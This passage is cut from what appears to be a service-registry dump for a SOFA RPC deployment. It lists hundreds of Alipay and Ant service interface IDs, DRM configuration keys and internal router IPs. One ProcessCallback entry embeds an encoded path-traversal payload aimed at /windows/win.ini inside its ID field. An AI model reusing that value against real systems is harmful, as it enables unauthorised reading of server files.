ULT_INSTANCE_ID#@#SOFA","com.alipay.mrchcommerce.pms.common.service.facade.api.MobilePosDeviceExtMapper:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.echox.service.EchoxAopPlaybackService:1.0:iexclienttrdcenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zcache.global.readBackToSource,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.transferprod.common.service.facade.api.BatchFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.RCacheServerTBaseCache.useZoneMng,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.revcore.common.service.facade.api.monthlystatement.MonthlyStatementService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.socialcore.facade.task.CityTaskTemplateQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-S_cfcoopration_service#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.iopenmng.biz.shared.service.ISkipApprovalHandler:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promoprod.common.service.facade.isv.IsvSignQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.instopen.service.facade.message.InstMessageQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.asttshipcore.service.facade.api.query.AccountingQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.23.240.128#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.fcbuservice.biz.shared.reclaim.MergeReclaimComponent:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbasecore.service.contentlib.ContentLibService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instpay.facade.api.WithdrawCancelService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:linglongmng@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.memberprod.mashup.service.account.close.CloseTaskQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zpaas.zappinfo.common.dal.kube.facade.KubeModelSyncFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ismonitor.core.service.censor.fault.CensorFaultService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","finlinkboss@msgbrokerMosn#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","cn.com.antcloud.accrmcore.common.service.facade.CRMDutSignFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.36.25.25#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.kbsales.common.service.download.DownloadCenterCallbackInterface:1.0:bpoAdjustDownloadCenterCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fundprod.common.service.facade.api.SystemParamService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opencore.service.facade.pub.PublicManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kgmng.common.service.facade.schema.NoumenonTrService:1.0:proxy@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mnotify.biz.client.client.rpc.MNotifyPluginRPCService:1.0:mdiscountprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finbatch:name=com.alipay.finbatch.biz.service.impl.drm.FinbatchCommonDRM.archiveDataCheck,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.cifprocess.custdpc.worker.WorkerService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:capacitystudio@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.73.158.138#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.ebppprod.common.service.facade.recharge.MobileSegmentNumberFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kabaoprod.service.facade.api.AlipassSyncFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bkfinancetradectrlcenter_processCallbackFacade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrmcore.common.service.facade.service.model.MdpModelService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.findecision:name=com.alipay.common.tracer.manage.TracerDrm.zdalTairDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mfinsnsprod.service.facade.api.forum.ForumGwManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finopencore.common.service.invest.facade.MarketInvestQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cloud.acsellcore.common.service.facade.UserCustomerShareFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.ck:name=com.alipay.zdal.config.groupCluster.securitycap_securityCapNormalDataSource_gc.ck,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zdaljdbc:name=com.alipay.zdal.monitor.drm.mwalletmng.mwalletmng_dataSource.validator,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.airbops:name=com.alipay.cif.utils.probe.ProbeDrmSwitch.reportDelay,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.50.78.43#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.ck:name=com.alipay.zdal.config.groupCluster.certifymngDataSourceOB14_gc.ck,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.openaccess.common.quickaccess.facade.service.proxy.RefreshDomainCacheFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.promocenter:name=com.alipay.promocenter.common.drm.PromocenterBussinessParamsDrmResource.pubilshMessageBizFromConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.memberprod.common.api.CloseInvokeRZService:1.0:voucherprod_campuscard@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.appxagg.common.service.facade.api.management.scenemsg.MsgGenTaskMngConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.exchangecore.common.service.facade.api.RemitAcceptFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditbenefit.facade.service.BenefitFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.icif.service.facade.apiv2.UserService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:demo3@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.mobileiclib.common.service.facade.admin.service.SceneProductStrategyConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkcloudfunds.service.facade.depository.api.BankCardRelationServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.reservecenter.common.service.facade.api.InnerbankAccountBalanceQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.imatchfacade.common.service.facade.space.SpaceApiService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_EC_PLATFORM_COMBINE_SALE_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.openmonitor.common.service.facade.health.IntegrationHealthService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","sofa_router_default_group_data_id#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.cifin:name=com.alipay.cif.client.drm.bankcardtaircache.CifQueryLocalCacheSwitcher.guardianType,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","dchainconsole@msgbrokerMosn#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.inshealthserviceprod.common.service.facade.api.HealthServiceItemInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.asset.statistics.service.impl.PortfolioProfitQueryServiceImpl.refleshPortfolioCache,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finbaservice.common.service.facade.auth.api.AuthUserFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:itemcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.icbcenter.service.facade.api.ChargebackModifyService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kabaoprod.biz.mwallet.card.manager.CardManager:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.certify.service.facade.enterprisesteward.account.EnterpriseStewardAccountManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.opencore:name=com.alipay.routeclient.DefaultRouteCoordinator.elasticRuleVersion,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mrchstoreapp.common.service.triple.store.generated.SofaStoreServiceTriple$IStoreService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:zmcreditprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finassetinsight.common.service.facade.api.FundRankQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.42.173#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.appstore.common.service.facade.hyp.TairCacheCheckFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openhome.facade.SpOperatorQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchasset.common.service.facade.assetquery.AssetQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_R_MERCHANT_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:psbp@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antchaos.facade.api.ChaosPlanFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.aftscv.common.service.facade.AftsCvTransactionCtrlService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.inslifeprod.common.facade.childrenaccount.ChildrenAccountFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.exratecenter.service.facade.api.ExSourceRateQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.supergw.service.facade.transaction.OutSyncTransCallBack:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.charge:name=com.alipay.guardian.client.sofa.drm.GuardianDrm.checkAutoType,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.instradeprod.common.service.InsPolicyAcceptanceFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instpay.settleprod.service.facade.gcard.PhoneCardFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zdataquery.common.service.facade.hbase.FinTntComposeExchangeWithdrawHbaseQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.settlequery.common.service.facade.config.api.ApiNotifyExtQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.qconsole.facade.KvStoreFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.cfmng:name=com.alipay.antvip.client.internal.drm.DrmControl.waitServerListTimeoutMs,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilecodec.common.spi.service.MobileCodecRouteService:1.0:mobileic@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mservice.biz.opmon.facade.CityServiceAlertCallbackFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:mapi@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finpwm.aip.notify.AppMsgSender:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:antPrivacyTemplate_ProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zcache:name=com.alipay.zdal.ldc.tair.cardbinMdmTairCache.cacheEngineUrl,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.overseaprod.common.service.tuition.tr.TuitionAccountFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.23.232.10#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fundboss.common.service.facade.meta.FundMetaConsultService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditauthprod.service.facade.QueryEasyMemberFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.appxagg.common.service.facade.api.management.video.VideoMngConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.findecision.common.service.facade.plugin.WsIntegrationService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mcenter.common.service.facade.McenterRecoverTaskFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rpc.common.service.facade.TripleHessianInterface:1.0:testUniqueId@tri#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.supergw.service.facade.transaction.TransReceiverService:1.0:supergw.d189.alipay.net@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.ifinflux.common.service.facade.AuthorizationService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.dmirror:name=com.alipay.antvip.client.internal.drm.DrmControl.restrainEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.securitydataservice:name=com.alipay.antvip.client.internal.drm.DrmControl.waitServerListTimeoutMs,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.pdcore.common.service.facade.item.api.ItemQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_169.254.72.60#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.cloudprovision:name=com.alipay.common.security.dresource.SecurityCommonDrm.checkUriWithFormated,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.memberprod.common.api.CloseWarningInvokeService:1.0:insusercenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ap.apshopcenter.common.service.facade.StampCertPublishFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pvsofaclient.facade.rest.service.facade.rpc.route.zproxy.BaseRouteRestFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","SOFA_PRC_TRANSMIT_ICDPCORE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cloudengine:name=com.alipay.cloudengine.loglevel.mashup.logLevelConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/windows/win.ini@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bpaas.ecomerchant.facade.isv.admin.IsvAdminFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.127.177#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.minitrans.core.config.drm.MftransSettleInitParamsDrmResourceInterface:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.inshealthcore.common.service.facade.api.family.GiftFamilyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ordermng.common.service.api.orderlink.notify.OrderLinkNotifyQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.koa-patch:name=com.alipay.sla.businessgray.drm.BusinessGrayPolicy.globalGrayAccountRange,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobileha.facade.antha.AnthaLegoAlarmDataFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.poscore:name=com.alipay.cif.client.drm.CifQueryLocalCacheSwitcher.tairHitRate,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.clive.common.service.facade.api.TbUserInfoQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csaccurate.service.facade.mng.api.ScenceQueryService:1.0:csaccurate@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.dataphin.publishing.common.facade.common.PublishCommonApi:1.0:dataphin-publishing@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fininfo.common.service.facade.info.InfoSystemInvokeService:1.0:finslip@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iotcore.spi.RpcSpi:1.0:admediamgr@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zskynet:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.vmCommonRule,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.ccdc.common.service.facade.PCICacheService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promokernel.common.service.facade.api.PrizeBudgetQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.socialcore.facade.relation.BaseRelationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.gateway.core.integration.CacheManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchasset.common.service.facade.common.AssetControllCommonConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.finfocore.common.service.integration.drm.DrmCdsCrowdManager.userCrowdInfoExpireInSecond,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.criskcenter.common.service.facade.legal.InfoLegalFileFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_C_TAXREFUND#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fincommontaskhub.service.facade.service.spi.DataProcessService:1.0:finbaservice@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.43.42#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.inshealthcore.common.service.facade.api.account.HealthAccountManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.framework.core.facade.OpscloudClientServiceFacade:1.0:ireplay@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.mrchcommerce.fmcgcore.common.service.facade.api.databoard.DataBoardQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.afwrobottwa:name=com.alipay.sla.businessgray.drm.BusinessGrayPolicy.globalGrayVersion,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.tradecore.service.facade.TradeExtFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csguide.service.facade.template.api.DataLabService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.processmng.common.service.plugin.facade.PluginService:1.0.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.opssla.common.service.facade.DrmManageFacade:1.0:iopssla@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.afsc.common.service.assistinvestigate.docsign.DocSignService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.common.service.integration.drm.loadtest.LoadTestConfigDrm.securityCoreQueryPolicyConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.superapi.common.core.client.AppInvokeService:1.0:isdsp@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers__NS_100.83.95.178_notify#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.insmarketingcore.common.service.facade.campaign.InsMktWorkFlowFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lightmds.service.permission.PermissionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.algoevaluator.common.service.EvaluationService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finassetcore.common.service.userprofile.facade.UserProfileQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.exchangecore.common.service.facade.api.OrderInfoFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.23.232.14#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.linke.aci.rest.api.UserAPIService#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mservice.common.service.facade.api.gateway.GatewayFacade:1.0:openmonitor_ats_guaranteeRuleListImpl@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileappcommon.common.service.facade.baas.HotpatchReviewMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.merchant.common.service.facade.OrderPageQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.82.87.97#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","config:com.alipay.openitemcore.common.service.facade.api.ordercore.OrderQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.finassistantcore.common.service.facade.fincontent.api.FinContentProductionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lendpofprod:name=com.alipay.zoneclient.internal.DynamicLdcSwitchResource.ldcTimeDelayed,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mapi.gateway.invoke.webservice.SysExterfaceInvokeService:1.0:globalprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.bizprodmng:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.enableGlobalCrc,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.admediamgr.common.service.facade.service.AdminMiddleManageServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.revcore.common.service.facade.api.invoice.RecycleInvoiceQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcardsales.common.service.facade.PcardSalesOrderQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.atd:name=com.alipay.cif.drm.PasswordRevokeSwitch.operationPasswordRevoked,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.fc.mif.common.service.facade.BizUnitQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.mobileops.common.service.facade.AlarmAnalysisFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finscprod.waitersupport.facade.SsmTradeRecordFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.agdscsalipay.common.service.facade.model.BuyerUnifiedModelFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.financemng.common.service.integration.kmi.KmiServiceClient:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.217.74#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.sandboxhome:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.faultInBizValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.overseaexprod.comon.service.facade.CityCardService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cloudinc:name=com.alipay.routeclient.DefaultRouteCoordinator.grayEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.jss.facade.service.TaskServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finscprod.facade.dataauth.DataAuthFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.common.service.facade.hotevent.api.HotEventSubjectFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gfinvest.facade.api.investment.InvestHandoverFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zskynet:name=com.alipay.common.tracer.manage.TracerDrm.zdalDbDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.acctrans.facade.api.acctrans.AcctransQueryFacade:1.0@XFIRE@cashiercloud_taobao#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.gftms.facade.api.basic.report.ForecastManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.discount.common.service.facade.test.DiscountRefreshService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.zdatabusPayInfoTairCache.compressionThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.settlequery.common.service.facade.config.api.BankCardRuleQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kgmng.common.service.facade.gremlin.GremlinResourceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.133.193#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.filebridge.service.facade.api.FileBridgeQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finreconchecker.common.service.integration.finrepaycenter.WithholdOrderQueryFacadeClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insinformcore.common.service.facade.std.api.config.DiseaseConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:tairmanager@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insusercenter.facade.attachment.api.InsAttachmentFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gotonemng.common.service.api.BatchTaskManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finassetpreference.api.facade.AssetRateTemplateOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rule.common.base.service.ScriptValidateService:1.0:securityservice@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.routeclient.interfacename:plugin-dep#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.linke.aci.core.facade.CIJobTransform:1.0:tektonCITemplateTransform@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mdataprod.common.service.facade.interfaces.MerchantOfflineTBDataService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acpmscore.facade.GocFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.zcbprod.common.service.facade.product.service.SharedProductQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#